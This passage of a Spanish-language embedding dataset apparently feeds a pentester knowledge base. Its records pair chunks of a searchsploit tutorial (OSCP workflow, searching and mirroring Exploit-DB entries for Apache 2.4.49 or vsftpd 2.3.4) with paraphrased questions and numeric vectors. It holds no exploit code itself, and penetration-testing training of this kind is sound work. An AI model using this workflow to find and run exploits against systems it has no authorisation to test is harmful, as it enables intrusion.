-0.01649, -0.00529, 0.01465, -0.0054, -0.0169, 0.03397, -0.03117, -0.08083, -0.01764, 0.00178, -0.03517, -0.07127, 0.03453, 0.04826, -0.00364, 0.01878, -0.07873, 0.07729, -0.01107, -0.01676, -0.0534, -0.0166, -0.05849, -0.02533, -0.0106, -0.01445, 0.01121, -0.02843, -0.00664, 0.00307, -0.01624, 0.01643, -0.00826, -0.05958, 0.01376, 0.03841, -0.05828, -0.05252, -0.03607, -0.0303, -0.04705, -0.03557, 0.07131, -0.01322, 0.06269, 0.00572, -0.00736, -0.0164, -0.01838, 0.04769, -0.00987, -0.01024, 0.02396, -0.02329, -0.05331, -0.00843, -0.00219, -0.03099, 0.01936, -0.02362, 0.02191, 0.04114, 0.04633, 0.04352, -0.01005, -0.03624, -0.03116, -0.04415, -0.0149, -0.05517, -0.02991, -0.0236, 0.06507, 0.06281, 0.06911]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# searchsploit\n\n> Buscador **offline** de Exploit-DB. El puente entre `nmap -sV` y la explotaciΓ³n. Copia local en `tu carpeta` (symlink en `tu carpeta`).", "indexar": "con quΓ© puedo consultar exploits copiados localmente?", "v": [0.05804, 0.23661, -0.14814, -0.02968, 0.02379, -0.16599, 0.09441, 0.13184, -0.14692, -0.08977, -0.01393, -0.06992, -0.01567, 0.11051, 0.01107, -0.16185, 0.1048, -0.08634, 0.00722, -0.08078, 0.02194, -0.07281, -0.02147, -0.01297, -0.05396, 0.02429, 0.01981, -0.03117, -0.02104, 0.00498, -0.04429, 0.09801, 0.00556, 0.04943, -0.06071, 0.08871, 0.08714, 0.06403, 0.02754, -0.04135, 0.08097, -0.01834, -0.2323, -0.03111, 0.03323, -0.06106, -0.16255, 0.01787, -0.09763, 0.01862, -0.02231, -0.10247, -0.15327, -0.14225, -0.05721, -0.02406, 0.17482, -0.03808, 0.01519, 0.0748, -0.06033, -0.0353, -0.00369, -0.01148, 0.07842, -0.06364, 0.05152, 0.00307, -0.04932, 0.08837, -0.08229, 0.10105, 0.05933, 0.01205, -0.03777, -0.06922, -0.00932, -0.08583, 0.01592, 0.08473, -0.02918, -0.06646, -0.01679, -0.04479, -0.01832, -0.03639, 0.0157, -0.03082, 0.01069, -0.08302, 0.03406, -0.00519, 0.01426, -0.02467, -0.09362, -0.07963, 0.06234, 0.0736, -0.05616, 0.1394, -0.06694, -0.07752, -0.05575, 0.07135, 0.02798, 0.00906, -0.01485, 0.02277, -0.02212, -0.03081, 0.00155, -0.01958, -0.08461, 0.06975, -0.06454, 0.01048, -0.00236, 0.01223, -0.03615, -0.00648, -0.02077, -0.07092, -0.00331, -0.04601, 0.038, -0.03391, 0.0117, 0.07801, -0.09543, -0.0844, -0.02212, 0.05126, 0.07041, 0.0115, 0.07127, -0.09658, -0.01309, -0.05829, -0.02487, -0.04342, -0.01763, 0.02107, -0.00895, -0.01157, -0.0589, 0.07337, 0.03589, -0.08089, -0.00296, -0.05668, -0.00871, -0.11787, -0.02824, 0.05098, -0.01803, 0.02415, 0.08887, -0.03786, 0.00891, 0.05326, 0.02307, 0.03843, 0.00549, -0.01625, -0.05242, -0.00346, -0.02109, -0.04541, -0.00182, 0.01292, -0.05931, 0.01621, -0.00537, -0.08075, 0.05373, -0.06879, -0.02647, 0.03405, -0.0024, -0.00332, -0.03712, 0.09914, 0.00771, 0.07428, -0.0173, 0.00883, 0.08181, 0.06801, 0.0382, -0.01989, 0.08644, 0.02136, 0.07347, 0.0326, -0.01953, -0.02, -0.03359, 0.08666, -0.03549, -0.02537, -0.05716, -0.00451, -0.11678, -0.06266, 0.11169, 0.04123, -0.01622, 0.05821, -0.09326, 0.04325, -0.06392, 0.00753, 0.02097, -0.05911, -0.04352, -0.00193, -0.00966, -0.00607, -0.04882, -0.0901, 0.05531, 0.04905, 0.10269, -0.02153, -0.02694, 0.03127, 0.01354, -0.03141, 0.00727, 0.12504, -0.01858, 0.05524, -0.0107, -0.0227, 0.02262, -0.00395, 0.01515, 0.0146, -0.04033, -0.03201, -0.02645, 0.08985, 0.0051, -0.0153, -0.0618, -0.00919, -0.05305, -0.04131, 0.0186, -0.07547, 0.02473, 0.02267, -0.0119, -0.05741, 0.02314, 0.00354]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El workflow OSCP\n```\nNmap -sV β†’ identificas servicio + VERSIΓ“N β†’ searchsploit β†’ explotas\n```\nSustituye a los escΓ‘neres de vulns prohibidos (Reglas de herramientas).", "indexar": "ΒΏQuΓ© herramienta puedo usar para identificar servicios y versiones en un sistema?", "v": [-0.0573, 0.14549, -0.11611, -0.15758, 0.03725, -0.15729, -0.09962, -0.15589, -0.07097, -0.09781, -0.17617, -0.15345, -0.03752, -0.03031, 0.01621, 0.00792, 0.04695, -0.16948, -0.01674, -0.02541, -0.06198, -0.08155, -0.13482, -0.0331, -0.17413, 0.08228, 0.06814, -0.10447, -0.16304, 0.0274, -0.02421, -0.01569, 0.04567, -0.08313, -0.17508, -0.05311, 0.00419, 0.03128, 0.05272, 0.05147, 0.05476, -0.01577, 0.05667, 0.0677, 0.10572, -0.01174, -0.02105, -0.00701, 0.00212, 0.05681, -0.05058, -0.14786, -0.17066, 0.00561, 0.03482, -0.19825, 0.1429, -0.07878, -0.01526, -0.0579, -0.08515, 0.01517, -0.06088, -0.00604, 0.05129, -0.10554, -0.04834, -0.06674, -0.0701, 0.10683, -0.02282, 0.01295, 0.10311, 0.02345, -0.03539, 0.0397, 0.00701, -0.02789, 0.05791, -0.00841, 0.03858, 0.03546, -0.09396, 0.03344, -0.0373, -0.07116, 0.0501, -0.02434, 0.0412, -0.09268, -0.01769, 0.03515, 0.00442, 0.02992, 0.02938, 0.01321, 0.02427, -0.01982, -0.04892, -0.02967, 0.13325, -0.04538, -0.06613, 0.12203, -0.08766, -0.07468, 0.02897, -0.04884, -0.06653, -0.0752, 0.01172, 0.00052, -0.08408, 0.02315, -0.01558, 0.04831, 0.0227, -0.0195, -0.02904, -0.03137, 0.03335, 0.06787, -0.00947, -0.09734, 0.1275, -0.00817, -0.01852, 0.10803, -0.04421, -0.05119, 0.02286, -0.06086, -0.09062, -0.03696, 0.00431, -0.00039, 0.07083, -0.06283, 0.02499, -0.01204, -0.01351, 0.02476, -0.03867, -0.07431, 0.02374, -0.00067, 0.04648, -0.06637, -0.02014, -0.03675, 0.01473, -0.03762, -0.06014, 0.00625, -0.02894, -0.05826, 0.02339, -0.04319, -0.11944, 0.00257, -0.02813, -0.05597, 0.08781, -0.01684, 0.00563, -0.02299, 0.05381, -0.0074, 0.06413, 0.03662, 0.07539, 0.04645, 0.08513, -0.04484, 0.03354, -0.05534, -0.07002, -0.02746, -0.00037, -0.00946, -0.02156, 0.00168, -0.02678, -0.02051, 0.05488, -0.01264, 0.01937, -0.01076, -0.03503, 0.0159, 0.00586, 0.05649, 0.03622, -0.03386, 0.04875, 0.03529, -0.00556, -0.04951, -0.00759, -0.00443, -0.10005, 0.00862, -0.04062, -0.05884, 0.03392, 0.04746, 0.00541, 0.02207, 0.04911, 0.05538, -0.002, 0.04993, 0.0522, -0.02956, -0.03867, 0.00901, -0.04626, 0.03106, 0.00568, -0.05979, 0.01317, 0.00343, 0.0142, 0.04062, 0.01931, 0.02222, 0.02804, -0.00385, -0.02394, -0.02537, 0.04099, -0.0355, 0.00583, -0.01198, 0.00188, -0.10254, 0.04961, -0.02117, -0.0491, -0.04931, 0.00761, 0.09067, 0.05326, 0.01056, -0.03793, -0.03128, -0.01202, -0.03089, -0.05144, -0.07788, -0.03508, 0.01643, 0.04739, -0.05769, 0.01134, 0.01276]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El workflow OSCP\n```\nNmap -sV β†’ identificas servicio + VERSIΓ“N β†’ searchsploit β†’ explotas\n```\nSustituye a los escΓ‘neres de vulns prohibidos (Reglas de herramientas).", "indexar": "Existe alguna alternativa libre o legal a los escΓ‘neres de vulnerabilidades prohibidos?", "v": [0.03484, 0.09232, -0.00485, 0.13754, -0.03365, 0.00944, 0.01629, 0.00342, -0.15747, -0.10365, 0.01308, -0.13409, -0.04398, 0.0141, 0.1096, 0.01258, 0.016, -0.03333, 0.06284, -0.03821, -0.04881, -0.12948, -0.0293, -0.06932, 0.02993, -0.12442, -0.05166, 0.00059, -0.06518, -0.06422, -0.09332, 0.07193, 0.06338, 0.0004, -0.06601, 0.11648, 0.01798, 0.05037, 0.13676, 0.04374, 0.1804, 0.00413, -0.02093, -0.01067, -0.01112, -0.08315, -0.19758, -0.04512, -0.11743, 0.06072, 0.00934, -0.04198, -0.17159, -0.01758, 0.12608, 0.00906, 0.09781, -0.02177, -0.07965, 0.02948, -0.08511, 0.02965, 0.09172, 0.01026, 0.03149, 0.09866, -0.05501, 0.04855, -0.00815, 0.11102, 0.08753, 0.00497, 0.05003, -0.00832, -0.07398, -0.06288, -0.13178, -0.05326, 0.01762, 0.03586, -0.00228, 0.03803, 0.02714, 0.09908, -0.11394, -0.07889, 0.02873, -0.07497, -0.00181, -0.00133, 0.1823, 0.08427, 0.00587, -0.02182, 0.0352, -0.0917, -0.02938, 0.17415, -0.04477, 0.07845, -0.00462, 0.04889, -0.03746, 0.01467, 0.06077, -0.01385, -0.03896, -0.00013, 0.05401, 0.06827, -0.06447, 0.05492, -0.05041, -0.02866, -0.01334, 0.05817, -0.07202, 0.03597, 0.11935, 0.02828, -0.03332, -0.10357, -0.01632, -0.00056, 0.01174, 0.0429, 0.02072, 0.15957, -0.10112, -0.00377, -0.01194, -0.05215, 0.0092, -0.01967, -0.0948, 0.02905, 0.00282, 0.03488, -0.01869, 0.01283, 0.04953, 0.00077, -0.01155, -0.00741, 0.03699, 0.04739, -0.03499, -0.02689, -0.02791, -0.05794, -0.01652, 0.06513, -0.03162, 0.10675, 0.03437, 0.09226, -0.06624, -0.10558, 0.01524, 0.14993, 0.06101, 0.07893, -0.05426, 0.08148, 0.00598, 0.06459, 0.05754, -0.02672, -0.03916, 0.04091, -0.03398, 0.10257, 0.06524, -0.05844, 0.04195, -0.09859, 0.02486, -0.11521, 0.05523, -0.0748, -0.02414, 0.00336, -0.10286, -0.02973, -0.00144, 0.05842, 0.04846, 0.02404, 0.10659, 0.06235, -0.05222, -0.03253, -0.06462, -0.05705, 0.04405, 0.01537, 0.06594, 0.01031, -0.01528, -0.07269, -0.07564, -0.02096, -0.04931, -0.01367, 0.0226, 0.01336, 0.06835, 0.02801, -0.03351, 0.02989, 0.03485, -0.00952, 0.00995, 0.00489, -0.08669, -0.02724, 0.02661, -0.01471, -0.0179, -0.05742, -0.00305, 0.0584, 0.01556, -0.00154, 0.02242, 0.01472, 0.01809, 0.03049, 0.04056, 0.06288, 0.00916, -0.00758, -0.01088, 0.04007, 0.04199, -0.00464, 0.00243, -0.0168, -0.00914, 0.01367, 0.03272, 0.05984, 0.00779, -0.02352, 0.01785, 0.00129, -0.05266, 0.00935, -0.03751, -0.03293, -0.02439, 0.04268, 0.07999, -0.05216, -0.00966, -0.01976]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El workflow OSCP\n```\nNmap -sV β†’ identificas servicio + VERSIΓ“N β†’ searchsploit β†’ explotas\n```\nSustituye a los escΓ‘neres de vulns prohibidos (Reglas de herramientas).", "indexar": "Con quΓ© programa puedo analizar una respuesta Nmap para buscar exploits conocidos?", "v": [-0.07596, 0.20175, -0.14811, -0.15546, -0.00517, -0.08295, 0.00159, 0.03304, -0.25936, -0.0263, 0.00988, -0.1123, -0.0136, 0.04468, -0.08504, 0.02489, 0.05817, 0.02453, 0.11768, 0.10825, 0.01682, -0.04489, -0.07492, -0.10497, -0.06316, 0.03735, -0.04899, -0.01917, 0.04181, 0.00439, -0.12677, 0.05054, -0.00315, -0.08902, -0.00609, 0.09905, 0.12054, -0.09062, -0.02338, 0.01037, -0.05865, -0.06339, -0.10432, -0.00142, 0.07371, -0.06586, -0.15427, -0.06974, -0.031, -0.12348, 0.0424, -0.03909, -0.11305, -0.04827, 0.00554, -0.12392, 0.02706, 0.02107, 0.0053, 0.02616, -0.03709, -0.06715, 0.06725, -0.09394, 0.04002, -0.08636, 0.1146, -0.00951, -0.1173, 0.06001, -0.03953, 0.09212, 0.00867, 0.02189, -0.00116, 0.05158, 0.0738, 0.00935, 0.05838, 0.0386, 0.01464, -0.0158, -0.12759, 0.06367, -0.05325, -0.03024, 0.02063, -0.02925, -0.0137, -0.06904, -0.04054, -0.00524, -0.02038, 0.07572, 0.03432, -0.05897, 0.14547, 0.00453, -0.01151, 0.1441, 0.0008, -0.08236, -0.16758, 0.10095, -0.02955, 0.09811, 0.04523, -0.03548, -0.07984, 0.01132, -0.00946, 0.0158, -0.12521, -0.04335, -0.01716, -0.04672, -0.09179, -0.02061, -0.01844, -0.04465, -0.08631, 0.1082, -0.07182, 0.01029, 0.12806, 0.008, 0.00332, 0.06958, 0.03797, 0.0089, 0.0007, 0.02919, -0.04382, -0.03073, -0.02821, -0.07583, 0.0337, -0.08269, 0.01528, -0.05916, 0.04804, 0.04005, -0.01536, -0.04174, -0.01535, 0.04638, -0.02525, -0.0778, -0.04048, -0.03001, -0.03258, 0.00789, 0.00576, 0.06989, -0.04042, -0.02227, 0.03419, -0.05538, -0.06792, 0.02401, -0.04307, -0.0106, -0.04399, 0.00096, 0.10436, -0.03509, 0.03676, -0.04507, 0.06326, 0.084, -0.0451, 0.06493, 0.04267, -0.10104, 0.05755, -0.05455, -0.00259, -0.07321, 0.05162, -0.03187, -0.04827, 0.00529, 0.0496, -0.00258, -0.09197, -0.01195, 0.03025, 0.01371, 0.01991, -0.0546, 0.04372, 0.01256, 0.05796, 0.01142, -0.01456, -0.01998, 0.03331, 0.0334, -0.02333, -0.07916, -0.06658, -0.01139, -0.0369, -0.00554, 0.01754, 0.08075, -0.02924, 0.04063, -0.00146, 0.06543, 0.01733, -0.0072, 0.0525, -0.03731, -0.05317, -0.06198, 0.01497, 0.11044, 0.05156, 0.05463, -0.00437, 0.09871, 0.04569, 0.08201, -0.03663, -0.03655, 0.01188, 0.01265, 0.00526, -0.01056, 0.0072, -0.008, -0.01639, -0.04252, 0.02082, -0.0297, -0.02051, -0.05923, -0.04799, -0.0179, -0.02005, 0.07537, -0.03216, -0.021, -0.02708, -0.0569, -0.02924, -0.01833, -0.01964, -0.04694, -0.02516, 0.02679, -0.00748, -0.07711, 0.11064, -0.00135]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Buscar\n```bash\nsearchsploit apache 2.4.49 # servicio + versiΓ³n EXACTA\nsearchsploit -t wordpress # -t = solo en el tΓ­tulo (menos ruido)\nsearchsploit \"vsftpd 2.3.4\"\nsearchsploit --nmap scan.xml # Β‘toma un nmap -oX y busca por ti!\n```\n- Quita la versiΓ³n si no sale nada (a veces el exploit es genΓ©rico).\n- Usa tΓ©rminos cortos: `searchsploit drupal` mejor que la cadena entera.", "indexar": "que programa hay para buscar exploits de seguridad especΓ­ficos?", "v": [-0.00272, 0.08568, -0.14507, -0.21443, -0.00237, -0.1157, -0.0402, -0.06928, -0.05337, -0.04733, 0.00078, -0.0016, -0.03032, -0.00397, -0.00174, -0.09447, 0.04649, -0.04852, 0.06071, 0.02353, 0.04854, 0.03187, 0.02759, -0.03499, -0.08743, 0.00865, -0.02176, -0.04579, -0.07937, 0.01198, -0.00561, 0.08071, 0.00176, -0.07232, -0.05343, 0.03579, 0.1166, -0.0724, 0.02359, 0.01921, 0.01563, -0.09296, -0.08621, -0.00763, 0.20065, -0.02051, -0.00937, 0.01138, 0.03659, -0.09117, 0.01337, -0.01444, -0.073, -0.14053, 0.10089, -0.113, -0.07179, 0.00126, -0.0549, 0.01848, -0.1409, -0.0437, 0.09523, -0.00863, 0.08481, -0.06722, 0.14578, -0.01049, -0.11827, 0.05361, 0.00092, -0.00886, 0.06604, 0.12349, 0.00795, -0.08996, 0.04542, 0.02542, 0.0147, 0.04489, -0.09243, 0.0257, -0.00579, 0.06376, -0.16809, -0.07567, 0.04781, 0.01195, -0.0748, -0.01105, 0.07272, 0.07808, -0.0296, 0.05222, -0.0108, -0.04414, 0.18615, 0.05859, -0.01639, 0.11495, -0.02147, -0.17169, -0.0331, 0.13642, -0.01443, 0.04503, -0.00355, 0.04622, -0.03802, -0.01398, -0.04051, -0.0382, 0.02526, -0.03633, -0.03793, 0.00147, -0.04047, -0.12363, 0.13949, -0.10731, -0.14186, 0.00218, -0.07593, 0.03995, 0.15493, -0.03759, -0.05457, 0.10846, -0.01829, 0.01009, 0.03619, -0.02107, -0.07095, 0.02789, -0.08682, -0.06512, 0.02794, -0.09506, -0.02332, -0.03081, 0.05242, 0.00316, 0.0222, -0.01611, 0.01179, 0.07234, 0.02391, -0.00749, -0.0002, 0.01198, -0.03377, -0.01377, -0.04572, 0.00029, -0.05585, 0.02183, -0.01468, -0.04531, -0.03083, 0.07514, 0.02359, -5e-05, -0.0097, -0.06129, 0.07398, -0.00235, 0.02255, -0.02801, 0.0506, 0.03959, -0.02542, 0.07154, 0.09457, -0.09186, -0.01676, -0.02067, -0.03106, -0.08786, 0.05303, -0.0466, -0.0857, -0.01428, 0.09348, 0.03199, 0.01719, -0.118, 0.05337, 0.02072, 0.01513, -0.02808, 0.04334, -0.01852, -0.01114, 0.07953, -0.06548, -0.0052, -0.01383, 0.01394, -0.00163, -0.05406, -0.04212, 0.01567, 0.02283, -0.00963, 0.0925, 0.05606, -0.00092, -0.03809, 0.03065, 0.05712, 0.03858, 0.01605, 0.00871, -0.02939, -0.09522, -0.02981, 0.04384, 0.08767, -0.00149, 0.0535, 0.01694, 0.02059, 0.00462, 0.05857, -0.05635, -0.07463, -0.02373, -0.00273, -0.00329, 0.03398, 0.00023, -0.03983, -0.08821, -0.01967, 0.02827, -0.05158, 0.00067, -0.0231, -0.00631, -0.08557, -0.05373, 0.07453, 0.02279, -0.05977, -0.08218, 0.00933, -0.07082, 0.05399, 0.00782, -0.01592, 0.01723, 0.001, -0.0323, -0.09012, 0.07218, -0.01967]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Buscar\n```bash\nsearchsploit apache 2.4.49 # servicio + versiΓ³n EXACTA\nsearchsploit -t wordpress # -t = solo en el tΓ­tulo (menos ruido)\nsearchsploit \"vsftpd 2.3.4\"\nsearchsploit --nmap scan.xml # Β‘toma un nmap -oX y busca por ti!\n```\n- Quita la versiΓ³n si no sale nada (a veces el exploit es genΓ©rico).\n- Usa tΓ©rminos cortos: `searchsploit drupal` mejor que la cadena entera.", "indexar": "con quΓ© puedo encontrar vulnerabilidades exactas en un servicio?", "v": [0.10566, 0.10955, -0.16285, 0.03382, 0.01109, 0.00514, -0.01804, -0.07245, -0.05783, -0.09049, -0.09885, -0.13363, -0.06239, 0.00345, -0.00525, 0.03479, 0.0595, -0.16758, 0.0799, 0.05168, -0.02157, -0.13257, -0.10146, -0.06463, -0.11506, 0.04427, 0.05477, -0.01021, -0.03549, -0.00984, -0.02069, -0.06233, -0.00748, 0.04247, -0.07045, 0.1341, -0.01328, 0.13662, 0.12885, -0.02456, 0.08957, 0.00118, 0.01395, -0.02129, 0.09443, -0.07799, -0.06352, -0.05698, -0.09136, -0.01108, -0.11829, -0.09876, -0.23072, -0.12018, -0.04851, -0.02769, 0.0856, -0.06071, 0.02795, 0.00209, -0.1125, 0.06701, 0.04817, 0.03396, 0.10103, -0.06824, -0.04261, 0.02207, -0.07596, 0.03814, -0.04307, -0.05982, -0.05093, -0.01162, -0.02489, 0.06853, -0.04431, -0.04038, -0.02131, 0.01407, 0.06178, 0.06471, -0.01137, -0.00454, -0.16468, -0.03275, 0.06951, -0.02418, 0.03921, -0.07611, 0.2084, 0.13133, -0.11584, 0.07136, -0.07274, 0.01006, 0.06431, -0.00506, -0.08556, -0.0387, -0.01963, 0.0059, -0.04396, 0.17255, -0.02054, 0.04703, -0.007, 0.02462, -0.00367, -0.11123, -0.00915, -0.05209, -0.03179, -0.03052, -0.05296, 0.02067, -0.02733, 0.00943, 0.08628, 0.02221, -0.04744, -0.09838, 0.06624, 0.03368, 0.02824, 0.05322, 0.02388, 0.02563, 0.00596, -0.07434, 0.02177, -0.03439, -0.04709, -0.03233, 0.04455, 0.05987, 0.09236, -0.10518, -0.0034, 0.03916, 0.04891, -0.01637, 0.06974, 0.0291, 0.01621, 0.03399, 0.05396, -0.06416, -0.07806, 0.01086, -0.01528, 0.03847, -0.03685, 0.05055, -0.01925, -0.00697, -0.03989, -0.07161, -0.02388, 0.06582, 0.03147, 0.07389, -0.00985, 0.02308, 0.00397, 0.00553, 0.05872, 0.03399, 0.06679, -0.0007, -0.08948, 0.0433, 0.01375, -0.06811, 0.01724, -0.01957, -0.01577, -0.07805, 0.01761, -0.04613, -0.02026, -0.0734, -0.01907, 0.02956, -0.01067, 0.01089, -0.00352, -0.01179, 0.03871, 0.01614, -0.02623, -0.05765, -0.00873, 0.05184, 0.02163, -0.0532, 0.02514, 0.01549, -0.09354, -0.10607, -0.1301, -0.00835, -0.04271, 0.00855, 0.06578, 0.05293, 0.00231, 4e-05, -0.03584, 0.03956, -0.01713, 0.02014, 0.13713, -0.08019, -0.09314, -0.01454, 0.03377, 0.02528, 0.00329, -0.00869, -0.02178, -0.06983, 0.0079, 0.02007, 0.04898, -0.03342, 0.01161, -0.04164, 0.02505, 0.06451, 0.03776, -0.02085, -0.08024, -0.04593, 0.0328, -0.0209, 0.01663, -0.00767, -0.00022, -0.01981, 0.03788, 0.06207, -0.01492, -0.04366, 0.02176, -0.0466, -0.05479, 0.01531, -0.04535, -0.07399, -0.02429, 0.0426, 0.04586, -0.09304, 0.04406, -0.10305]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Buscar\n```bash\nsearchsploit apache 2.4.49 # servicio + versiΓ³n EXACTA\nsearchsploit -t wordpress # -t = solo en el tΓ­tulo (menos ruido)\nsearchsploit \"vsftpd 2.3.4\"\nsearchsploit --nmap scan.xml # Β‘toma un nmap -oX y busca por ti!\n```\n- Quita la versiΓ³n si no sale nada (a veces el exploit es genΓ©rico).\n- Usa tΓ©rminos cortos: `searchsploit drupal` mejor que la cadena entera.", "indexar": "cual es una alternativa libre a los buscadores tradicionales de exploits?", "v": [0.22105, 0.03977, -0.12058, 0.06338, -0.01774, 0.05052, 0.10639, -0.04958, -0.05648, -0.07369, -0.03252, -0.06303, -0.06371, 0.04164, 0.07367, -0.09591, 0.11269, -0.07405, 0.10445, -0.02141, -0.01642, -0.02793, -0.04622, -0.07519, -0.04728, -0.13619, -0.02191, -0.01988, -0.06745, 0.03174, -0.01106, 0.09294, 0.06474, -0.03191, -0.05652, -0.01823, 0.08407, 0.01322, -0.0194, -0.10641, 0.08832, -0.11153, -0.16566, -0.009, -0.04613, -0.08481, -0.15991, 0.02194, -0.09003, -0.04223, -0.00787, -0.02112, -0.18322, 0.01521, 0.10452, -0.06541, 0.1189, -0.04006, -0.06751, -0.04315, -0.06199, 0.00032, 0.10882, -0.00534, 0.07172, -0.05508, 0.05682, 0.01551, -0.06535, 0.07957, 0.05161, 0.05125, -0.01044, 0.03797, -0.031, 0.1139, 0.06532, 0.04285, 0.00073, 0.04032, 0.01325, -0.11266, -0.01799, 0.0394, -0.12073, -0.12266, 0.09002, -0.10159, -0.03103, -0.05307, 0.05938, 0.01413, -0.01462, 0.07765, -0.04412, -0.08278, 0.10306, 0.04183, 0.01133, 0.15412, 0.02973, -0.02042, -0.09043, 0.04294, 0.06959, -0.05476, 0.02872, 0.00573, -0.05062, -0.00077, 0.00589, -0.01794, 0.01125, 0.01378, 0.00355, 0.02815, -0.09222, -0.08167, 0.02633, -0.07563, -0.10215, 0.02276, -0.07361, -0.00801, 0.03656, -0.00775, -0.00468, 0.02494, 0.02973, -0.02145, 0.08128, -0.00711, -0.03672, -0.02887, -0.09569, -0.06201, 0.09511, -0.07513, 0.05351, 0.00459, 0.03614, 0.02364, 0.01186, -0.13537, 0.10149, 0.00262, 0.07315, -0.01682, -0.01081, -0.07454, -0.14268, -0.00627, -0.04833, 0.11526, -0.05225, 0.01505, -0.07332, -0.04115, -0.06586, 0.15226, 0.04323, -0.02045, 0.011, -0.00404, -0.03222, 0.00863, -0.03716, -0.07722, -0.00564, -0.00643, -0.03272, 0.03856, -0.00938, -0.11066, 0.05116, -0.02034, -0.06406, -0.0717, 0.09811, -0.0294, -0.04084, 0.05528, -0.08232, -0.00468, -0.00228, -0.07353, 0.03978, -0.02486, 0.00674, -0.01689, 0.05778, -0.01724, -0.05553, -0.02118, -0.0461, -0.0087, -0.03747, -0.03876, 0.01424, -0.08057, -0.05814, 0.00631, -0.03338, -0.06583, -0.03408, 0.01558, -0.0079, -0.00753, -0.0138, 0.07952, -0.00211, -0.01875, 0.03811, -0.05965, -0.09754, -0.03983, 0.03033, -0.07133, -0.0256, -0.02244, 0.07433, 0.06958, 0.04912, 0.00715, -0.01548, 0.02455, 0.04603, 0.0235, -0.05609, -0.00515, -0.03225, -0.0145, -0.06389, -0.00098, 0.03748, 0.02805, -0.00137, -0.0242, -0.04622, -0.01214, 0.02945, 0.04817, -0.01673, 0.01695, -0.02463, -0.04724, -0.12142, -0.03241, 0.02814, -0.04194, -0.05978, 0.05692, 0.05986, -0.02285, 0.07596, -0.07729]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Examinar y copiar\n```bash\nsearchsploit -x 50383 # ver el exploit (path por EDB-ID)\nsearchsploit -m 50383 # MIRROR: lo copia a tu carpeta actual\nsearchsploit -p 50383 # solo imprime la ruta\nsearchsploit -u # actualizar la base\n```", "indexar": "que herramienta sirve para buscar exploits en Linux?", "v": [-0.02228, 0.03758, -0.21737, -0.20175, 0.00632, -0.18366, -0.21302, 0.06285, -0.01256, -0.01112, 0.01209, -0.08945, 0.02183, -0.02673, 0.02994, -0.09184, -0.01935, -0.14902, -0.03125, -0.06864, -0.07502, 0.15649, -0.12794, -0.03484, -0.01036, 0.0109, 0.05809, -0.14856, -0.07116, 0.09894, -0.12005, 0.08499, 0.00706, -0.00138, -0.07272, 0.00324, 0.01904, -0.02619, 0.08062, 0.10547, 0.09999, -0.00777, -0.09837, 0.03302, -0.04344, -0.13277, -0.01382, -0.02174, 0.03097, -0.01653, 0.06792, -0.12656, -0.15172, -0.03272, 0.06507, -0.07117, 0.16414, -0.1328, 0.0333, -0.04712, -0.20299, -0.06802, -0.02863, -0.06132, 0.04367, -0.01742, 0.00536, -0.05596, -0.12094, 0.07193, -0.02718, 0.12055, 0.00674, 0.00635, -0.02099, -0.01015, -0.01316, 0.09043, 0.03902, 0.00256, 0.03875, -0.02064, -0.05866, 0.02743, -0.10686, -0.16938, 0.11162, 0.05144, -0.0025, -0.00958, -0.00725, 0.09795, -0.02293, 0.04608, 0.0711, 0.00709, 0.13162, 0.02716, 0.02436, 0.00814, 0.0136, -0.06468, -0.11152, 0.06333, -0.01237, -0.00457, -0.00639, -0.01528, -0.0598, -0.04473, 0.07524, -0.02925, 0.05968, 0.0269, -0.01675, 0.03276, -0.065, -0.05634, -0.01803, -0.04854, -0.00326, 0.03014, -0.07973, 0.00614, 0.00343, -0.01131, -0.05762, 0.09345, 0.01477, -0.12685, 0.04396, -0.09681, -0.02226, 0.08875, -0.02314, -0.03571, 0.06156, -0.138, -0.01151, -0.04073, 0.05089, 0.06208, -0.01439, -0.0841, 0.0712, 0.03575, 0.0547, -0.01227, 0.01983, -0.10061, -0.02564, -0.07554, -0.00728, 0.01254, -0.0856, -0.03481, -0.00162, 0.01608, -0.10494, 0.00521, -0.01053, -0.06929, 0.04956, 0.01254, -0.03208, -0.02324, 0.03019, 0.02927, 0.03446, 0.0321, 0.03179, 0.05243, 0.04688, -0.05006, 0.02113, -0.09459, 0.00523, -0.00258, 0.00332, -0.01621, -0.00378, -0.00538, 0.00545, -0.01869, 0.02956, -0.00812, 0.02482, -0.0086, -0.00126, -0.02726, 0.06859, 0.00098, 0.03152, -0.02213, -0.0257, 0.05484, -0.03095, -0.00204, 0.01721, -0.0454, -0.06549, 0.0303, -0.0337, -0.02074, 0.03134, 0.0156, -0.02275, -0.02585, -0.02873, 0.01385, 0.00322, 0.05195, 0.01642, -0.04566, -0.02414, -0.03603, 0.03111, 0.06439, 0.00059, -0.00897, 0.00108, 0.00779, 0.03673, -0.00214, -0.02223, -0.01659, -0.01302, -0.02993, -0.02904, -0.02832, 0.0568, -0.02797, 0.0052, 0.02161, -0.01982, -0.08497, 0.04439, 0.01868, -0.01881, -0.01445, -0.0585, 0.04708, 0.0231, -0.03899, -0.05522, -0.05419, -0.01007, -0.03083, -0.03169, -0.06212, -0.03248, -0.01912, 0.02751, -0.02154, 